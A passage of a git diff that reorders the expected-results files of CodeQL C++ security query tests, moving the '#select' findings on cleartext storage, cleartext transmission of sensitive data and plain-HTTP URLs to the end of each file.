@@ -1,19 +1,3 @@ -#select -| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | password | this source. | -| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | -| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | -| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | -| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | -| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | -| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. | -| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. 
| -| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | -| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | -| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | -| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | edges | test2.cpp:62:18:62:25 | password | test2.cpp:62:18:62:25 | password | provenance | | | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | provenance | | 
@@ -42,3 +26,19 @@ nodes | test.cpp:73:43:73:53 | thePassword | semmle.label | thePassword | | test.cpp:73:63:73:73 | thePassword | semmle.label | thePassword | subpaths +#select +| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | password | this source. | +| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | +| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | +| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | +| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | +| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | +| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. 
| +| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. | +| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | +| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | +| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | +| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected index 370555e6811b..fae3d76599a8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected 
@@ -1,44 +1,3 @@ -#select -| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | -| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | -| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | -| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | -| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | -| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | -| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:101:12:101:19 | password | password | -| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. 
| test3.cpp:134:11:134:18 | password | password | -| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | -| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | -| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | -| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | -| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | -| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. | test3.cpp:270:16:270:23 | password | password | -| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. 
| test3.cpp:317:11:317:19 | password1 | password1 | -| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | -| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | -| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | -| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:420:15:420:24 | password | password | -| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. 
| test3.cpp:431:8:431:15 | password | password | -| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | -| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | -| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | -| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | -| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | -| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. | test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | -| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. 
| test3.cpp:513:14:513:22 | email | email | -| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | -| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | -| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | -| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | -| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | -| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:526:44:526:54 | my_latitude | my_latitude | -| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. 
| test3.cpp:532:45:532:58 | home_longitude | home_longitude | -| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | salaryString | salaryString | -| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | -| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | -| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | edges | test3.cpp:74:21:74:29 | password1 | test3.cpp:74:21:74:29 | password1 | provenance | | | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | provenance | | 
@@ -181,3 +140,44 @@ nodes | test3.cpp:578:14:578:16 | str | semmle.label | str | subpaths | test3.cpp:138:24:138:32 | password1 | test3.cpp:117:28:117:33 | buffer | test3.cpp:117:13:117:14 | *id | test3.cpp:138:21:138:22 | call to id | +#select +| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | +| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | +| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | +| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | +| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | +| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | +| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. 
| test3.cpp:101:12:101:19 | password | password | +| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. | test3.cpp:134:11:134:18 | password | password | +| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | +| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | +| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | +| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | +| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | +| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. 
| test3.cpp:270:16:270:23 | password | password | +| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:317:11:317:19 | password1 | password1 | +| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | +| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | +| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | +| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. 
| test3.cpp:420:15:420:24 | password | password | +| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:431:8:431:15 | password | password | +| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | +| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | +| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | +| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | +| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | +| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. 
| test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | +| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. | test3.cpp:513:14:513:22 | email | email | +| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | +| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | +| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | +| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | +| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | +| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. 
| test3.cpp:526:44:526:54 | my_latitude | my_latitude | +| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:532:45:532:58 | home_longitude | home_longitude | +| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | salaryString | salaryString | +| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | +| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | +| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected index 00185bff5faf..971cdb4f3ff3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected 
@@ -1,10 +1,3 @@ -#select -| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:46:18:46:26 | http:// | test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | edges | test.cpp:11:26:11:28 | *url | test.cpp:15:30:15:32 | *url | provenance | | | test.cpp:24:13:24:17 | **url_g | test.cpp:38:11:38:15 | *url_g | provenance | | 
@@ -48,3 +41,10 @@ nodes | test.cpp:116:3:116:37 | *... = ... | semmle.label | *... = ... | | test.cpp:121:11:121:13 | *ptr | semmle.label | *ptr | subpaths +#select +| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:46:18:46:26 | http:// | test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected index 4f1a66d4cdf5..ca20f65bec72 100644 --- 